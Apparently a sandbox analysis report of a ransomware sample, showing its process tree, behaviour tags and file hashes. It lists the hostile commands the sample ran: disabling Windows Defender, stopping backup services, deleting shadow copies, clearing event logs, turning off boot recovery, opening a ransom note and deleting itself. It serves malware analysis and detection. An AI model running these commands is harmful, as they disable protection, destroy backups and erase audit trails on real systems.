fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3292 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 3292 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1836 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 1836 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe sc.exe PID 1276 wrote to memory of 320 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 320 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3480 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3480 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3188 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3188 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3212 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3212 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3776 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe PID 1276 wrote to memory of 3776 1276 fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:924
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:2080
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4020
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:776
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:2380
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:608
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2716
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1580
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12a5d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y3⤵PID:2440
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1428
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1452
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1584
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2120
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3180
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:3272
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2868
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3292
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12a5d" start= disabled2⤵PID:1836
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:320
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3480
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3188
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3212
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1988
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1440
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:820
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1992
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4040
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4044
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3216
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2740
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:8
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2616
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2680
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3672
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1272
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1056
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2328
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1920
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:772
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2304
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2956
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3396 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1672 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2784 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3624
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3792
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2196
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3872
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1868 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:648
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1160 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:736 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2336 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4056 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3684
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:900 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3652 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1112 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\4a7Z_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2436 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"2⤵PID:2684
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:60
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
e8581e1c0975e92f67bf014e1e1adb97
SHA122b2946186cdfbd125da2de12550df1394b6548e
SHA256b5a8f263eaf410d0353d41f31c68080dcc3ac5f6272de7970b23f0b47e55cfd6
SHA512cc2ec7f112a1629d47687dfb41988404a107ec79644f222121478ce0134e0f6410d6496988e45b681f463ba71d56666afc2355f92a10501e9c094bc4665085ae
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
3f0468cb81c9d485aeeece028d74f25b
SHA1dcd40e2d4f657298ba2449dbd22f19db457830eb
SHA2568a9d0f4893a005f3e9ad3c0dac3bc9d796b009c93ecd0bed049f2310df1760a4
SHA512326071256dd1d37e60471ba32bd7613898bc564e51b6d357a4578b40dce414976537f6e70b9c93a2f9a37415f04af91ef1fdfd4594c2be1ac1b86887244faf46